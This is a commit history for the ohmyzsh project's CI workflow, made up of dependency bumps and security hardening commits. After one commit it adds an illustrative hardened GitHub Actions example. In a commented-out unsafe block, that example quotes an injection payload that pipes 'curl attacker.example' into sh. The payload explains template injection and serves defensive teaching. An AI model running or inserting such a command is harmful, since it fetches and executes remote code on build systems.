dependabot[bot]
3fd2331ae8
chore(deps): bump step-security/harden-runner from 2.14.2 to 2.15.0 ( #13601 )
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2 weeks ago
dependabot[bot]
116be8badd
chore(deps): bump step-security/harden-runner from 2.14.1 to 2.14.2 ( #13557 )
Bumps [step-security/harden-runner](https://github.com/step-security/harden-runner ) from 2.14.1 to 2.14.2.
- [Release notes](https://github.com/step-security/harden-runner/releases )
- [Commits](e3f713f2d8...5ef0c079ce )
---
updated-dependencies:
- dependency-name: step-security/harden-runner
dependency-version: 2.14.2
dependency-type: direct:production
update-type: version-update:semver-patch
...
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
1 month ago
dependabot[bot]
9df4ea095f
chore(deps): bump step-security/harden-runner from 2.14.0 to 2.14.1 ( #13547 )
Bumps [step-security/harden-runner](https://github.com/step-security/harden-runner ) from 2.14.0 to 2.14.1.
- [Release notes](https://github.com/step-security/harden-runner/releases )
- [Commits](20cf305ff2...e3f713f2d8 )
---
updated-dependencies:
- dependency-name: step-security/harden-runner
dependency-version: 2.14.1
dependency-type: direct:production
update-type: version-update:semver-patch
...
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
1 month ago
dependabot[bot]
1fee750c3b
chore(deps): bump step-security/harden-runner from 2.13.3 to 2.14.0 ( #13483 )
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
3 months ago
dependabot[bot]
0ebeae78d0
chore(deps): bump actions/create-github-app-token from 2.2.0 to 2.2.1 ( #13470 )
Bumps [actions/create-github-app-token](https://github.com/actions/create-github-app-token ) from 2.2.0 to 2.2.1.
- [Release notes](https://github.com/actions/create-github-app-token/releases )
- [Commits](7e473efe3c...29824e69f5 )
---
updated-dependencies:
- dependency-name: actions/create-github-app-token
dependency-version: 2.2.1
dependency-type: direct:production
update-type: version-update:semver-patch
...
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
3 months ago
dependabot[bot]
3b66f643e4
chore(deps): bump step-security/harden-runner from 2.13.2 to 2.13.3 ( #13471 )
Bumps [step-security/harden-runner](https://github.com/step-security/harden-runner ) from 2.13.2 to 2.13.3.
- [Release notes](https://github.com/step-security/harden-runner/releases )
- [Commits](95d9a5deda...df199fb7be )
---
updated-dependencies:
- dependency-name: step-security/harden-runner
dependency-version: 2.13.3
dependency-type: direct:production
update-type: version-update:semver-patch
...
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
3 months ago
dependabot[bot]
beadd56dd7
chore(deps): bump actions/create-github-app-token from 2.1.4 to 2.2.0 ( #13440 )
Bumps [actions/create-github-app-token](https://github.com/actions/create-github-app-token ) from 2.1.4 to 2.2.0.
- [Release notes](https://github.com/actions/create-github-app-token/releases )
- [Commits](6701853927...7e473efe3c )
---
updated-dependencies:
- dependency-name: actions/create-github-app-token
dependency-version: 2.2.0
dependency-type: direct:production
update-type: version-update:semver-minor
...
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
4 months ago
dependabot[bot]
18d0a63df8
chore(deps): bump step-security/harden-runner from 2.13.1 to 2.13.2 ( #13414 )
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
4 months ago
Marc Cornellà
242e2faa51
ci: improve security in project.yml workflow ( #13329 )
There is no inherent security vulnerability in the workflow, but there were
certain practices that increased latent risk. In this commit, we:
- Explicitly bind app token for each step that needs it, instead of setting it for
all steps after "Store app token"
- Refactor "classify" step, to not rely on files passed around, and instead use
only an awk script.
- Remove all instances of template injection within `run` scripts. There was nothing
dangerous, but the practice is unsafe.
- Sanitize all unwanted characters from PR plugin and theme names.
References: W2M1-06 W2M1-07
6 months ago
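As an added illustration (not the ohmyzsh project's own project.yml and not code from the commit above), here is a workflow fragment that applies the practices the commit describes: an untrusted PR title expanded by the template engine directly into a `run` script, shown beside the env-bound form; an allow-list sanitization of the plugin or theme name; the app token bound only to the step that uses it instead of job-wide; and an empty top-level `permissions` block of the kind the older "harden permissions" commit on this page introduced. The `pull_request_target` trigger, the secret names `APP_ID` and `APP_PRIVATE_KEY`, and the closing `gh pr view` call are assumptions for the example; the project-field update itself is left out.

```yaml
# Added example, not ohmyzsh's project.yml. Trigger, secret names and the
# final gh call are assumptions; the project-field update is omitted.
name: Project tracking (hardened example)

on:
  # pull_request_target runs in the base repository's context with access to
  # its secrets, so anything taken from the PR event is attacker-controlled.
  pull_request_target:
    types: [opened, reopened]

# Least privilege: the default GITHUB_TOKEN gets no permissions at all.
# The steps that need write access use a short-lived app token instead.
permissions: {}

jobs:
  classify:
    runs-on: ubuntu-latest
    steps:
      - name: Harden runner
        uses: step-security/harden-runner@v2
        with:
          egress-policy: audit

      # UNSAFE (the pattern the commit removes): ${{ }} is expanded into the
      # script *text* before bash runs it. A PR title such as
      #   "; curl attacker.example | sh #
      # would therefore be executed, not printed.
      #
      # - name: Classify (unsafe)
      #   run: echo "Title: ${{ github.event.pull_request.title }}"

      # SAFE: route event data through env. The shell only ever sees it as the
      # value of a variable, so the title cannot change the script's structure.
      - name: Classify
        id: classify
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: |
          # Take the conventional-commit scope, e.g. "git" from "git: fix foo",
          # using awk alone rather than intermediate files.
          name=$(printf '%s\n' "$PR_TITLE" | awk -F: 'NF > 1 { print $1 }')
          # Allow-list: keep only characters a plugin or theme directory name
          # can contain; everything else (quotes, spaces, backticks, ...) is dropped.
          safe=$(printf '%s' "$name" | tr -cd 'A-Za-z0-9._-')
          echo "name=$safe" >> "$GITHUB_OUTPUT"

      - name: Get app token
        id: app-token
        uses: actions/create-github-app-token@v2
        with:
          app-id: ${{ secrets.APP_ID }}                 # assumed secret name
          private-key: ${{ secrets.APP_PRIVATE_KEY }}   # assumed secret name

      # The token is bound to this single step via env, not exported to every
      # step that follows "Get app token".
      - name: Look up PR with the app token
        if: steps.classify.outputs.name != ''
        env:
          GH_TOKEN: ${{ steps.app-token.outputs.token }}
          PR_NUMBER: ${{ github.event.pull_request.number }}
          ITEM_NAME: ${{ steps.classify.outputs.name }}
        run: |
          gh pr view "$PR_NUMBER" --repo "$GITHUB_REPOSITORY" --json number,title
          echo "would file PR #$PR_NUMBER under plugin/theme '$ITEM_NAME'"
```

Two checks worth making when reviewing a workflow like this: grep every `run:` block for `${{` and move each hit into `env:`, and confirm that no token-bearing variable is declared at the `jobs.<id>.env` or top-level `env` level, since that hands the token to every step, including third-party actions that never needed it.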
StepSecurity Bot
7f3d8a34e2
ci: Harden GitHub Actions [StepSecurity] ( #13318 )
6 months ago
Carlo Sala
5c804257ce
ci: use `actions/create-github-app-token` ( #13233 )
8 months ago
Carlo Sala
544eb17e33
ci(project): use ohmyzsh's bot credentials
2 years ago
Marc Cornellà
1342459b15
ci: fix update of plugin or theme fields
See [1] for the reference of value field (ProjectV2FieldValue type),
and [2] for sample application code.
[1] https://docs.github.com/en/graphql/reference/input-objects#projectv2fieldvalue
[2] https://docs.github.com/en/enterprise-cloud@latest/issues/planning-and-tracking-with-projects/automating-your-project/automating-projects-using-actions#example-workflow-authenticating-with-a-github-app
3 years ago
Lennart Ochel
239e2f9fcd
ci: migrate to ProjectV2 GraphQL API ( #11311 )
3 years ago
Alex
065f5ffc5a
ci: harden permissions for GitHub Workflows ( #11174 )
* build: harden main.yml permissions
Signed-off-by: Alex <aleksandrosansan@gmail.com>
* build: harden project.yml permissions
Signed-off-by: Alex <aleksandrosansan@gmail.com>
* Update project.yml
The permissions are not necessary, because a separate token is used `GITHUB_TOKEN: ${{ secrets.PROJECT_TOKEN }}`
3 years ago
Marc Cornellà
4d9e5ce9a7
ci(project): sort issues and PRs when reopened
4 years ago
Marc Cornellà
ebfd7cb219
ci: cancel current runs on new trigger
4 years ago
Marc Cornellà
b481955761
ci(project): fix .list files not found error
4 years ago
Marc Cornellà
0ca2e48ee8
ci(project): fix `gh pr view` call to use ohmyzsh repository
4 years ago
Marc Cornellà
63345c4e5d
ci: disable GitHub Actions on forks
4 years ago
Marc Cornellà
512839ef78
chore: simplify project GitHub Action
4 years ago
Marc Cornellà
9dd1dc49d9
chore: simplify `GITHUB_TOKEN` env in project GitHub Action
4 years ago
Marc Cornellà
121ee818a5
chore: I'm dumb af
4 years ago
Marc Cornellà
dd7f0f2211
chore: let's try again
4 years ago
Marc Cornellà
17c52ccfc9
chore: look ma no auth!
4 years ago
Marc Cornellà
861e7e24a3
chore: please work
4 years ago
Marc Cornellà
1d35b30461
chore: fix auth in Project tracking Action
4 years ago
Marc Cornellà
95a66532d1
chore: use GITHUB_TOKEN auth for Project Beta GitHub Action
4 years ago
Marc Cornellà
d1c07f9569
chore: add Projects Beta GitHub Action
4 years ago